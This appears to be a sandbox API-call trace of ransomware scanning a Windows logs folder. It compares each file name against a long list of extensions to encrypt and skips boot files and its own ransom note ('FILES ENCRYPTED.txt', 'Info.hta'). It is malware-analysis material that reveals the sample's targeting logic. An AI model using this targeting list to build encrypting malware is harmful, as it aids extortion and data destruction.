[0164.845] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log") returned 37 [0164.845] lstrlenW (lpString=".1cd") returned 4 [0164.845] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0164.845] lstrlenW (lpString=".3ds") returned 4 [0164.845] lstrcmpiW (lpString1=".3ds", lpString2=".log") returned -1 [0164.845] lstrlenW (lpString=".3fr") returned 4 [0164.845] lstrcmpiW (lpString1=".3fr", lpString2=".log") returned -1 [0164.845] lstrlenW (lpString=".3g2") returned 4 [0164.845] lstrcmpiW (lpString1=".3g2", lpString2=".log") returned -1 [0164.845] lstrlenW (lpString=".3gp") returned 4 [0164.846] lstrcmpiW (lpString1=".3gp", lpString2=".log") returned -1 [0164.846] lstrlenW (lpString=".7z") returned 3 [0164.846] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0164.846] lstrlenW (lpString=".accda") returned 6 [0164.846] lstrcmpiW (lpString1=".accda", lpString2="66.log") returned -1 [0164.846] lstrlenW (lpString=".accdb") returned 6 [0164.846] lstrcmpiW (lpString1=".accdb", lpString2="66.log") returned -1 [0164.846] lstrlenW (lpString=".accdc") returned 6 [0164.846] lstrcmpiW (lpString1=".accdc", lpString2="66.log") returned -1 [0164.846] lstrlenW (lpString=".accde") returned 6 [0164.846] lstrcmpiW (lpString1=".accde", lpString2="66.log") returned -1 [0164.846] lstrlenW (lpString=".accdt") returned 6 [0164.846] lstrcmpiW (lpString1=".accdt", lpString2="66.log") returned -1 [0164.846] lstrlenW (lpString=".accdw") returned 6 [0164.846] lstrcmpiW (lpString1=".accdw", lpString2="66.log") returned -1 [0164.846] lstrlenW (lpString=".adb") returned 4 [0164.846] lstrcmpiW (lpString1=".adb", lpString2=".log") returned -1 [0164.846] lstrlenW (lpString=".adp") returned 4 [0164.846] lstrcmpiW (lpString1=".adp", lpString2=".log") returned -1 [0164.846] lstrlenW (lpString=".ai") returned 3 [0164.846] lstrcmpiW (lpString1=".ai", lpString2="log") returned -1 [0164.846] lstrlenW (lpString=".ai3") returned 4 [0164.846] lstrcmpiW (lpString1=".ai3", lpString2=".log") returned -1 [0164.846] lstrlenW (lpString=".ai4") returned 4 [0164.846] lstrcmpiW (lpString1=".ai4", lpString2=".log") returned -1 [0164.846] lstrlenW (lpString=".ai5") returned 4 [0164.846] lstrcmpiW (lpString1=".ai5", lpString2=".log") returned -1 [0164.846] lstrlenW (lpString=".ai6") returned 4 [0164.846] lstrcmpiW (lpString1=".ai6", lpString2=".log") returned -1 [0164.846] lstrlenW (lpString=".ai7") returned 4 [0164.846] lstrcmpiW (lpString1=".ai7", lpString2=".log") returned -1 [0164.846] lstrlenW (lpString=".ai8") returned 4 [0164.846] lstrcmpiW (lpString1=".ai8", lpString2=".log") returned -1 [0164.846] lstrlenW (lpString=".anim") returned 5 [0164.846] lstrcmpiW (lpString1=".anim", lpString2="6.log") returned -1 [0164.847] lstrlenW (lpString=".arw") returned 4 [0164.847] lstrcmpiW (lpString1=".arw", lpString2=".log") returned -1 [0164.847] lstrlenW (lpString=".as") returned 3 [0164.847] lstrcmpiW (lpString1=".as", lpString2="log") returned -1 [0164.847] lstrlenW (lpString=".asa") returned 4 [0164.847] lstrcmpiW (lpString1=".asa", lpString2=".log") returned -1 [0164.847] lstrlenW (lpString=".asc") returned 4 [0164.847] lstrcmpiW (lpString1=".asc", lpString2=".log") returned -1 [0164.847] lstrlenW (lpString=".ascx") returned 5 [0164.847] lstrcmpiW (lpString1=".ascx", lpString2="6.log") returned -1 [0164.847] lstrlenW (lpString=".asm") returned 4 [0164.847] lstrcmpiW (lpString1=".asm", lpString2=".log") returned -1 [0164.847] lstrlenW (lpString=".asmx") returned 5 [0164.847] lstrcmpiW (lpString1=".asmx", lpString2="6.log") returned -1 [0164.847] lstrlenW (lpString=".asp") returned 4 [0164.847] lstrcmpiW (lpString1=".asp", lpString2=".log") returned -1 [0164.847] lstrlenW (lpString=".aspx") returned 5 [0164.847] lstrcmpiW (lpString1=".aspx", lpString2="6.log") returned -1 [0164.847] lstrlenW (lpString=".asr") returned 4 [0164.847] lstrcmpiW (lpString1=".asr", lpString2=".log") returned -1 [0164.847] lstrlenW (lpString=".asx") returned 4 [0164.847] lstrcmpiW (lpString1=".asx", lpString2=".log") returned -1 [0164.847] lstrlenW (lpString=".avi") returned 4 [0164.847] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0164.847] lstrlenW (lpString=".avs") returned 4 [0164.847] lstrcmpiW (lpString1=".avs", lpString2=".log") returned -1 [0164.847] lstrlenW (lpString=".backup") returned 7 [0164.847] lstrcmpiW (lpString1=".backup", lpString2="766.log") returned -1 [0164.847] lstrlenW (lpString=".bak") returned 4 [0164.847] lstrcmpiW (lpString1=".bak", lpString2=".log") returned -1 [0164.847] lstrlenW (lpString=".bay") returned 4 [0164.848] lstrcmpiW (lpString1=".bay", lpString2=".log") returned -1 [0164.848] lstrlenW (lpString=".bd") returned 3 [0164.848] lstrcmpiW (lpString1=".bd", lpString2="log") returned -1 [0164.848] lstrlenW (lpString=".bin") returned 4 [0164.848] lstrcmpiW (lpString1=".bin", lpString2=".log") returned -1 [0164.848] lstrlenW (lpString=".bmp") returned 4 [0164.848] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0164.848] lstrlenW (lpString=".bz2") returned 4 [0164.848] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0164.848] lstrlenW (lpString=".c") returned 2 [0164.848] lstrcmpiW (lpString1=".c", lpString2="og") returned -1 [0164.848] lstrlenW (lpString=".cdr") returned 4 [0164.848] lstrcmpiW (lpString1=".cdr", lpString2=".log") returned -1 [0164.848] lstrlenW (lpString=".cer") returned 4 [0164.848] lstrcmpiW (lpString1=".cer", lpString2=".log") returned -1 [0164.848] lstrlenW (lpString=".cf") returned 3 [0164.848] lstrcmpiW (lpString1=".cf", lpString2="log") returned -1 [0164.848] lstrlenW (lpString=".cfc") returned 4 [0164.848] lstrcmpiW (lpString1=".cfc", lpString2=".log") returned -1 [0164.848] lstrlenW (lpString=".cfm") returned 4 [0164.848] lstrcmpiW (lpString1=".cfm", lpString2=".log") returned -1 [0164.848] lstrlenW (lpString=".cfml") returned 5 [0164.848] lstrcmpiW (lpString1=".cfml", lpString2="6.log") returned -1 [0164.848] lstrlenW (lpString=".cfu") returned 4 [0164.848] lstrcmpiW (lpString1=".cfu", lpString2=".log") returned -1 [0164.848] lstrlenW (lpString=".chm") returned 4 [0164.848] lstrcmpiW (lpString1=".chm", lpString2=".log") returned -1 [0164.848] lstrlenW (lpString=".cin") returned 4 [0164.848] lstrcmpiW (lpString1=".cin", lpString2=".log") returned -1 [0164.848] lstrlenW (lpString=".class") returned 6 [0164.848] lstrcmpiW (lpString1=".class", lpString2="66.log") returned -1 [0164.848] lstrlenW (lpString=".clx") returned 4 [0164.848] lstrcmpiW (lpString1=".clx", lpString2=".log") returned -1 [0164.848] lstrlenW (lpString=".config") returned 7 [0164.848] lstrcmpiW (lpString1=".config", lpString2="766.log") returned -1 [0164.848] lstrlenW (lpString=".cpp") returned 4 [0164.848] lstrcmpiW (lpString1=".cpp", lpString2=".log") returned -1 [0164.849] lstrlenW (lpString=".cr2") returned 4 [0164.849] lstrcmpiW (lpString1=".cr2", lpString2=".log") returned -1 [0164.849] lstrlenW (lpString=".crt") returned 4 [0164.849] lstrcmpiW (lpString1=".crt", lpString2=".log") returned -1 [0164.849] lstrlenW (lpString=".crw") returned 4 [0164.849] lstrcmpiW (lpString1=".crw", lpString2=".log") returned -1 [0164.849] lstrlenW (lpString=".cs") returned 3 [0164.849] lstrcmpiW (lpString1=".cs", lpString2="log") returned -1 [0164.849] lstrlenW (lpString=".css") returned 4 [0164.849] lstrcmpiW (lpString1=".css", lpString2=".log") returned -1 [0164.849] lstrlenW (lpString=".csv") returned 4 [0164.849] lstrcmpiW (lpString1=".csv", lpString2=".log") returned -1 [0164.849] lstrlenW (lpString=".cub") returned 4 [0164.849] lstrcmpiW (lpString1=".cub", lpString2=".log") returned -1 [0164.849] lstrlenW (lpString=".dae") returned 4 [0164.849] lstrcmpiW (lpString1=".dae", lpString2=".log") returned -1 [0164.849] lstrlenW (lpString=".dat") returned 4 [0164.849] lstrcmpiW (lpString1=".dat", lpString2=".log") returned -1 [0164.849] lstrlenW (lpString=".db") returned 3 [0164.849] lstrcmpiW (lpString1=".db", lpString2="log") returned -1 [0164.849] lstrlenW (lpString=".dbf") returned 4 [0164.849] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0164.849] lstrlenW (lpString=".dbx") returned 4 [0164.849] lstrcmpiW (lpString1=".dbx", lpString2=".log") returned -1 [0164.849] lstrlenW (lpString=".dc3") returned 4 [0164.849] lstrcmpiW (lpString1=".dc3", lpString2=".log") returned -1 [0164.849] lstrlenW (lpString=".dcm") returned 4 [0164.849] lstrcmpiW (lpString1=".dcm", lpString2=".log") returned -1 [0164.849] lstrlenW (lpString=".dcr") returned 4 [0164.849] lstrcmpiW (lpString1=".dcr", lpString2=".log") returned -1 [0164.849] lstrlenW (lpString=".der") returned 4 [0164.849] lstrcmpiW (lpString1=".der", lpString2=".log") returned -1 [0164.849] lstrlenW (lpString=".dib") returned 4 [0164.849] lstrcmpiW (lpString1=".dib", lpString2=".log") returned -1 [0164.849] lstrlenW (lpString=".dic") returned 4 [0164.849] lstrcmpiW (lpString1=".dic", lpString2=".log") returned -1 [0164.850] lstrlenW (lpString=".dif") returned 4 [0164.850] lstrcmpiW (lpString1=".dif", lpString2=".log") returned -1 [0164.850] lstrlenW (lpString=".divx") returned 5 [0164.850] lstrcmpiW (lpString1=".divx", lpString2="6.log") returned -1 [0164.850] lstrlenW (lpString=".djvu") returned 5 [0164.850] lstrcmpiW (lpString1=".djvu", lpString2="6.log") returned -1 [0164.850] lstrlenW (lpString=".dng") returned 4 [0164.850] lstrcmpiW (lpString1=".dng", lpString2=".log") returned -1 [0164.850] lstrlenW (lpString=".doc") returned 4 [0164.850] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0164.850] lstrlenW (lpString=".docm") returned 5 [0164.850] lstrcmpiW (lpString1=".docm", lpString2="6.log") returned -1 [0164.850] lstrlenW (lpString=".docx") returned 5 [0164.850] lstrcmpiW (lpString1=".docx", lpString2="6.log") returned -1 [0164.850] lstrlenW (lpString=".dot") returned 4 [0164.850] lstrcmpiW (lpString1=".dot", lpString2=".log") returned -1 [0164.850] lstrlenW (lpString=".dotm") returned 5 [0164.850] lstrcmpiW (lpString1=".dotm", lpString2="6.log") returned -1 [0164.850] lstrlenW (lpString=".dotx") returned 5 [0164.850] lstrcmpiW (lpString1=".dotx", lpString2="6.log") returned -1 [0164.850] lstrlenW (lpString=".dpx") returned 4 [0164.850] lstrcmpiW (lpString1=".dpx", lpString2=".log") returned -1 [0164.850] lstrlenW (lpString=".dqy") returned 4 [0164.850] lstrcmpiW (lpString1=".dqy", lpString2=".log") returned -1 [0164.850] lstrlenW (lpString=".dsn") returned 4 [0164.850] lstrcmpiW (lpString1=".dsn", lpString2=".log") returned -1 [0164.850] lstrlenW (lpString=".dt") returned 3 [0164.850] lstrcmpiW (lpString1=".dt", lpString2="log") returned -1 [0164.850] lstrlenW (lpString=".dtd") returned 4 [0164.850] lstrcmpiW (lpString1=".dtd", lpString2=".log") returned -1 [0164.850] lstrlenW (lpString=".dwg") returned 4 [0164.850] lstrcmpiW (lpString1=".dwg", lpString2=".log") returned -1 [0164.850] lstrlenW (lpString=".dwt") returned 4 [0164.850] lstrcmpiW (lpString1=".dwt", lpString2=".log") returned -1 [0164.850] lstrlenW (lpString=".dx") returned 3 [0164.850] lstrcmpiW (lpString1=".dx", lpString2="log") returned -1 [0164.850] lstrlenW (lpString=".dxf") returned 4 [0164.850] lstrcmpiW (lpString1=".dxf", lpString2=".log") returned -1 [0164.850] lstrlenW (lpString=".edml") returned 5 [0164.851] lstrcmpiW (lpString1=".edml", lpString2="6.log") returned -1 [0164.851] lstrlenW (lpString=".efd") returned 4 [0164.851] lstrcmpiW (lpString1=".efd", lpString2=".log") returned -1 [0164.851] lstrlenW (lpString=".elf") returned 4 [0164.851] lstrcmpiW (lpString1=".elf", lpString2=".log") returned -1 [0164.851] lstrlenW (lpString=".emf") returned 4 [0164.851] lstrcmpiW (lpString1=".emf", lpString2=".log") returned -1 [0164.851] lstrlenW (lpString=".emz") returned 4 [0164.851] lstrcmpiW (lpString1=".emz", lpString2=".log") returned -1 [0164.851] lstrlenW (lpString=".epf") returned 4 [0164.851] lstrcmpiW (lpString1=".epf", lpString2=".log") returned -1 [0164.851] lstrlenW (lpString=".eps") returned 4 [0164.851] lstrcmpiW (lpString1=".eps", lpString2=".log") returned -1 [0164.851] lstrlenW (lpString=".epsf") returned 5 [0164.851] lstrcmpiW (lpString1=".epsf", lpString2="6.log") returned -1 [0164.851] lstrlenW (lpString=".epsp") returned 5 [0164.851] lstrcmpiW (lpString1=".epsp", lpString2="6.log") returned -1 [0164.851] lstrlenW (lpString=".erf") returned 4 [0164.851] lstrcmpiW (lpString1=".erf", lpString2=".log") returned -1 [0164.851] lstrlenW (lpString=".exr") returned 4 [0164.851] lstrcmpiW (lpString1=".exr", lpString2=".log") returned -1 [0164.851] lstrlenW (lpString=".f4v") returned 4 [0164.851] lstrcmpiW (lpString1=".f4v", lpString2=".log") returned -1 [0164.851] lstrlenW (lpString=".fido") returned 5 [0164.851] lstrcmpiW (lpString1=".fido", lpString2="6.log") returned -1 [0164.851] lstrlenW (lpString=".flm") returned 4 [0164.851] lstrcmpiW (lpString1=".flm", lpString2=".log") returned -1 [0164.851] lstrlenW (lpString=".flv") returned 4 [0164.851] lstrcmpiW (lpString1=".flv", lpString2=".log") returned -1 [0164.851] lstrlenW (lpString=".frm") returned 4 [0164.851] lstrcmpiW (lpString1=".frm", lpString2=".log") returned -1 [0164.851] lstrlenW (lpString=".fxg") returned 4 [0164.851] lstrcmpiW (lpString1=".fxg", lpString2=".log") returned -1 [0164.851] lstrlenW (lpString=".geo") returned 4 [0164.851] lstrcmpiW (lpString1=".geo", lpString2=".log") returned -1 [0164.851] lstrlenW (lpString=".gif") returned 4 [0164.851] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0164.851] lstrlenW (lpString=".grs") returned 4 [0164.851] lstrcmpiW (lpString1=".grs", lpString2=".log") returned -1 [0164.851] lstrlenW (lpString=".gz") returned 3 [0164.851] lstrcmpiW (lpString1=".gz", lpString2="log") returned -1 [0164.852] lstrlenW (lpString=".h") returned 2 [0164.852] lstrcmpiW (lpString1=".h", lpString2="og") returned -1 [0164.852] lstrlenW (lpString=".hdr") returned 4 [0164.852] lstrcmpiW (lpString1=".hdr", lpString2=".log") returned -1 [0164.852] lstrlenW (lpString=".hpp") returned 4 [0164.852] lstrcmpiW (lpString1=".hpp", lpString2=".log") returned -1 [0164.852] lstrlenW (lpString=".hta") returned 4 [0164.852] lstrcmpiW (lpString1=".hta", lpString2=".log") returned -1 [0164.852] lstrlenW (lpString=".htc") returned 4 [0164.852] lstrcmpiW (lpString1=".htc", lpString2=".log") returned -1 [0164.852] lstrlenW (lpString=".htm") returned 4 [0164.852] lstrcmpiW (lpString1=".htm", lpString2=".log") returned -1 [0164.852] lstrlenW (lpString=".html") returned 5 [0164.852] lstrcmpiW (lpString1=".html", lpString2="6.log") returned -1 [0164.852] lstrlenW (lpString=".icb") returned 4 [0164.852] lstrcmpiW (lpString1=".icb", lpString2=".log") returned -1 [0164.852] lstrlenW (lpString=".ics") returned 4 [0164.852] lstrcmpiW (lpString1=".ics", lpString2=".log") returned -1 [0164.852] lstrlenW (lpString=".iff") returned 4 [0164.852] lstrcmpiW (lpString1=".iff", lpString2=".log") returned -1 [0164.852] lstrlenW (lpString=".inc") returned 4 [0164.852] lstrcmpiW (lpString1=".inc", lpString2=".log") returned -1 [0164.852] lstrlenW (lpString=".indd") returned 5 [0164.852] lstrcmpiW (lpString1=".indd", lpString2="6.log") returned -1 [0164.852] lstrlenW (lpString=".ini") returned 4 [0164.852] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0164.852] lstrlenW (lpString=".iqy") returned 4 [0164.852] lstrcmpiW (lpString1=".iqy", lpString2=".log") returned -1 [0164.852] lstrlenW (lpString=".j2c") returned 4 [0164.852] lstrcmpiW (lpString1=".j2c", lpString2=".log") returned -1 [0164.852] lstrlenW (lpString=".j2k") returned 4 [0164.852] lstrcmpiW (lpString1=".j2k", lpString2=".log") returned -1 [0164.852] lstrlenW (lpString=".java") returned 5 [0164.852] lstrcmpiW (lpString1=".java", lpString2="6.log") returned -1 [0164.852] lstrlenW (lpString=".jp2") returned 4 [0164.852] lstrcmpiW (lpString1=".jp2", lpString2=".log") returned -1 [0164.852] lstrlenW (lpString=".jpc") returned 4 [0164.852] lstrcmpiW (lpString1=".jpc", lpString2=".log") returned -1 [0164.852] lstrlenW (lpString=".jpe") returned 4 [0164.853] lstrcmpiW (lpString1=".jpe", lpString2=".log") returned -1 [0164.853] lstrlenW (lpString=".jpeg") returned 5 [0164.853] lstrcmpiW (lpString1=".jpeg", lpString2="6.log") returned -1 [0164.853] lstrlenW (lpString=".jpf") returned 4 [0164.853] lstrcmpiW (lpString1=".jpf", lpString2=".log") returned -1 [0164.853] lstrlenW (lpString=".jpg") returned 4 [0164.853] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0164.853] lstrlenW (lpString=".jpx") returned 4 [0164.853] lstrcmpiW (lpString1=".jpx", lpString2=".log") returned -1 [0164.853] lstrlenW (lpString=".js") returned 3 [0164.853] lstrcmpiW (lpString1=".js", lpString2="log") returned -1 [0164.853] lstrlenW (lpString=".jsf") returned 4 [0164.853] lstrcmpiW (lpString1=".jsf", lpString2=".log") returned -1 [0164.853] lstrlenW (lpString=".json") returned 5 [0164.853] lstrcmpiW (lpString1=".json", lpString2="6.log") returned -1 [0164.853] lstrlenW (lpString=".jsp") returned 4 [0164.853] lstrcmpiW (lpString1=".jsp", lpString2=".log") returned -1 [0164.853] lstrlenW (lpString=".kdc") returned 4 [0164.853] lstrcmpiW (lpString1=".kdc", lpString2=".log") returned -1 [0164.853] lstrlenW (lpString=".kmz") returned 4 [0164.853] lstrcmpiW (lpString1=".kmz", lpString2=".log") returned -1 [0164.853] lstrlenW (lpString=".kwm") returned 4 [0164.853] lstrcmpiW (lpString1=".kwm", lpString2=".log") returned -1 [0164.853] lstrlenW (lpString=".lasso") returned 6 [0164.853] lstrcmpiW (lpString1=".lasso", lpString2="66.log") returned -1 [0164.853] lstrlenW (lpString=".lbi") returned 4 [0164.853] lstrcmpiW (lpString1=".lbi", lpString2=".log") returned -1 [0164.853] lstrlenW (lpString=".lgf") returned 4 [0164.853] lstrcmpiW (lpString1=".lgf", lpString2=".log") returned -1 [0164.854] lstrlenW (lpString=".lgp") returned 4 [0164.854] lstrcmpiW (lpString1=".lgp", lpString2=".log") returned -1 [0164.854] lstrlenW (lpString=".log") returned 4 [0164.854] lstrcmpiW (lpString1=".log", lpString2=".log") returned 0 [0164.854] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log") returned 37 [0164.854] lstrlenW (lpString=".MSPLT") returned 6 [0164.854] lstrcmpiW (lpString1=".MSPLT", lpString2="66.log") returned -1 [0164.854] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log") returned 37 [0164.854] lstrcmpiW (lpString1="boot.ini", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned -1 [0164.854] lstrcmpiW (lpString1="bootfont.bin", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned -1 [0164.854] lstrcmpiW (lpString1="ntldr", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0164.854] lstrcmpiW (lpString1="ntdetect.com", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0164.854] lstrcmpiW (lpString1="io.sys", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0164.854] lstrcmpiW (lpString1="FILES ENCRYPTED.txt", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0164.854] lstrcmpiW (lpString1="Info.hta", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0164.854] lstrcmpiW (lpString1="wdgmug.exe", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0164.854] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0164.854] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x0, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="OOBE_2~1.LOG")) returned 1 [0164.854] lstrlenW (lpString="oobe_2017_09_07_03_08_57_737.log") returned 32 [0164.854] lstrlenW (lpString=".1cd") returned 4 [0164.854] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0164.854] lstrlenW (lpString=".3ds") returned 4 [0164.854] lstrcmpiW (lpString1=".3ds", lpString2=".log") returned -1 [0164.854] lstrlenW (lpString=".3fr") returned 4 [0164.854] lstrcmpiW (lpString1=".3fr", lpString2=".log") returned -1 [0164.854] lstrlenW (lpString=".3g2") returned 4 [0164.854] lstrcmpiW (lpString1=".3g2", lpString2=".log") returned -1 [0164.854] lstrlenW (lpString=".3gp") returned 4 [0164.855] lstrcmpiW (lpString1=".3gp", lpString2=".log") returned -1 [0164.855] lstrlenW (lpString=".7z") returned 3 [0164.855] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0164.855] lstrlenW (lpString=".accda") returned 6 [0164.855] lstrcmpiW (lpString1=".accda", lpString2="37.log") returned -1 [0164.855] lstrlenW (lpString=".accdb") returned 6 [0164.855] lstrcmpiW (lpString1=".accdb", lpString2="37.log") returned -1 [0164.855] lstrlenW (lpString=".accdc") returned 6 [0164.855] lstrcmpiW (lpString1=".accdc", lpString2="37.log") returned -1 [0164.855] lstrlenW (lpString=".accde") returned 6 [0164.855] lstrcmpiW (lpString1=".accde", lpString2="37.log") returned -1 [0164.855] lstrlenW (lpString=".accdt") returned 6 [0164.855] lstrcmpiW (lpString1=".accdt", lpString2="37.log") returned -1 [0164.855] lstrlenW (lpString=".accdw") returned 6 [0164.855] lstrcmpiW (lpString1=".accdw", lpString2="37.log") returned -1 [0164.855] lstrlenW (lpString=".adb") returned 4 [0164.855] lstrcmpiW (lpString1=".adb", lpString2=".log") returned -1 [0164.855] lstrlenW (lpString=".adp") returned 4 [0164.855] lstrcmpiW (lpString1=".adp", lpString2=".log") returned -1 [0164.855] lstrlenW (lpString=".ai") returned 3 [0164.855] lstrcmpiW (lpString1=".ai", lpString2="log") returned -1 [0164.855] lstrlenW (lpString=".ai3") returned 4 [0164.855] lstrcmpiW (lpString1=".ai3", lpString2=".log") returned -1 [0164.855] lstrlenW (lpString=".ai4") returned 4 [0164.855] lstrcmpiW (lpString1=".ai4", lpString2=".log") returned -1 [0164.855] lstrlenW (lpString=".ai5") returned 4 [0164.855] lstrcmpiW (lpString1=".ai5", lpString2=".log") returned -1 [0164.855] lstrlenW (lpString=".ai6") returned 4 [0164.855] lstrcmpiW (lpString1=".ai6", lpString2=".log") returned -1 [0164.855] lstrlenW (lpString=".ai7") returned 4 [0164.855] lstrcmpiW (lpString1=".ai7", lpString2=".log") returned -1 [0164.855] lstrlenW (lpString=".ai8") returned 4 [0164.855] lstrcmpiW (lpString1=".ai8", lpString2=".log") returned -1 [0164.855] lstrlenW (lpString=".anim") returned 5 [0164.856] lstrcmpiW (lpString1=".anim", lpString2="7.log") returned -1 [0164.856] lstrlenW (lpString=".arw") returned 4 [0164.856] lstrcmpiW (lpString1=".arw", lpString2=".log") returned -1 [0164.856] lstrlenW (lpString=".as") returned 3 [0164.856] lstrcmpiW (lpString1=".as", lpString2="log") returned -1 [0164.856] lstrlenW (lpString=".asa") returned 4 [0164.856] lstrcmpiW (lpString1=".asa", lpString2=".log") returned -1 [0164.856] lstrlenW (lpString=".asc") returned 4 [0164.856] lstrcmpiW (lpString1=".asc", lpString2=".log") returned -1 [0164.856] lstrlenW (lpString=".ascx") returned 5 [0164.856] lstrcmpiW (lpString1=".ascx", lpString2="7.log") returned -1 [0164.856] lstrlenW (lpString=".asm") returned 4 [0164.856] lstrcmpiW (lpString1=".asm", lpString2=".log") returned -1 [0164.856] lstrlenW (lpString=".asmx") returned 5 [0164.856] lstrcmpiW (lpString1=".asmx", lpString2="7.log") returned -1 [0164.856] lstrlenW (lpString=".asp") returned 4 [0164.856] lstrcmpiW (lpString1=".asp", lpString2=".log") returned -1 [0164.856] lstrlenW (lpString=".aspx") returned 5 [0164.856] lstrcmpiW (lpString1=".aspx", lpString2="7.log") returned -1 [0164.856] lstrlenW (lpString=".asr") returned 4 [0164.856] lstrcmpiW (lpString1=".asr", lpString2=".log") returned -1 [0164.856] lstrlenW (lpString=".asx") returned 4 [0164.856] lstrcmpiW (lpString1=".asx", lpString2=".log") returned -1 [0164.856] lstrlenW (lpString=".avi") returned 4 [0164.856] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0164.856] lstrlenW (lpString=".avs") returned 4 [0164.856] lstrcmpiW (lpString1=".avs", lpString2=".log") returned -1 [0164.856] lstrlenW (lpString=".backup") returned 7 [0164.856] lstrcmpiW (lpString1=".backup", lpString2="737.log") returned -1 [0164.856] lstrlenW (lpString=".bak") returned 4 [0164.856] lstrcmpiW (lpString1=".bak", lpString2=".log") returned -1 [0164.856] lstrlenW (lpString=".bay") returned 4 [0164.856] lstrcmpiW (lpString1=".bay", lpString2=".log") returned -1 [0164.856] lstrlenW (lpString=".bd") returned 3 [0164.856] lstrcmpiW (lpString1=".bd", lpString2="log") returned -1 [0164.857] lstrlenW (lpString=".bin") returned 4 [0164.857] lstrcmpiW (lpString1=".bin", lpString2=".log") returned -1 [0164.857] lstrlenW (lpString=".bmp") returned 4 [0164.857] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0164.857] lstrlenW (lpString=".bz2") returned 4 [0164.857] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0164.857] lstrlenW (lpString=".c") returned 2 [0164.857] lstrcmpiW (lpString1=".c", lpString2="og") returned -1 [0164.857] lstrlenW (lpString=".cdr") returned 4 [0164.857] lstrcmpiW (lpString1=".cdr", lpString2=".log") returned -1 [0164.857] lstrlenW (lpString=".cer") returned 4 [0164.857] lstrcmpiW (lpString1=".cer", lpString2=".log") returned -1 [0164.857] lstrlenW (lpString=".cf") returned 3 [0164.857] lstrcmpiW (lpString1=".cf", lpString2="log") returned -1 [0164.857] lstrlenW (lpString=".cfc") returned 4 [0164.857] lstrcmpiW (lpString1=".cfc", lpString2=".log") returned -1 [0164.857] lstrlenW (lpString=".cfm") returned 4 [0164.857] lstrcmpiW (lpString1=".cfm", lpString2=".log") returned -1 [0164.857] lstrlenW (lpString=".cfml") returned 5 [0164.857] lstrcmpiW (lpString1=".cfml", lpString2="7.log") returned -1 [0164.857] lstrlenW (lpString=".cfu") returned 4 [0164.857] lstrcmpiW (lpString1=".cfu", lpString2=".log") returned -1 [0164.857] lstrlenW (lpString=".chm") returned 4 [0164.857] lstrcmpiW (lpString1=".chm", lpString2=".log") returned -1 [0164.857] lstrlenW (lpString=".cin") returned 4 [0164.857] lstrcmpiW (lpString1=".cin", lpString2=".log") returned -1 [0164.857] lstrlenW (lpString=".class") returned 6 [0164.857] lstrcmpiW (lpString1=".class", lpString2="37.log") returned -1 [0164.857] lstrlenW (lpString=".clx") returned 4 [0164.857] lstrcmpiW (lpString1=".clx", lpString2=".log") returned -1 [0164.857] lstrlenW (lpString=".config") returned 7 [0164.857] lstrcmpiW (lpString1=".config", lpString2="737.log") returned -1 [0164.857] lstrlenW (lpString=".cpp") returned 4 [0164.857] lstrcmpiW (lpString1=".cpp", lpString2=".log") returned -1 [0164.857] lstrlenW (lpString=".cr2") returned 4 [0164.857] lstrcmpiW (lpString1=".cr2", lpString2=".log") returned -1 [0164.857] lstrlenW (lpString=".crt") returned 4 [0164.857] lstrcmpiW (lpString1=".crt", lpString2=".log") returned -1 [0164.858] lstrlenW (lpString=".crw") returned 4 [0164.858] lstrcmpiW (lpString1=".crw", lpString2=".log") returned -1 [0164.858] lstrlenW (lpString=".cs") returned 3 [0164.858] lstrcmpiW (lpString1=".cs", lpString2="log") returned -1 [0164.858] lstrlenW (lpString=".css") returned 4 [0164.858] lstrcmpiW (lpString1=".css", lpString2=".log") returned -1 [0164.858] lstrlenW (lpString=".csv") returned 4 [0164.858] lstrcmpiW (lpString1=".csv", lpString2=".log") returned -1 [0164.858] lstrlenW (lpString=".cub") returned 4 [0164.858] lstrcmpiW (lpString1=".cub", lpString2=".log") returned -1 [0164.858] lstrlenW (lpString=".dae") returned 4 [0164.858] lstrcmpiW (lpString1=".dae", lpString2=".log") returned -1 [0164.858] lstrlenW (lpString=".dat") returned 4 [0164.858] lstrcmpiW (lpString1=".dat", lpString2=".log") returned -1 [0164.858] lstrlenW (lpString=".db") returned 3 [0164.858] lstrcmpiW (lpString1=".db", lpString2="log") returned -1 [0164.858] lstrlenW (lpString=".dbf") returned 4 [0164.858] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0164.858] lstrlenW (lpString=".dbx") returned 4 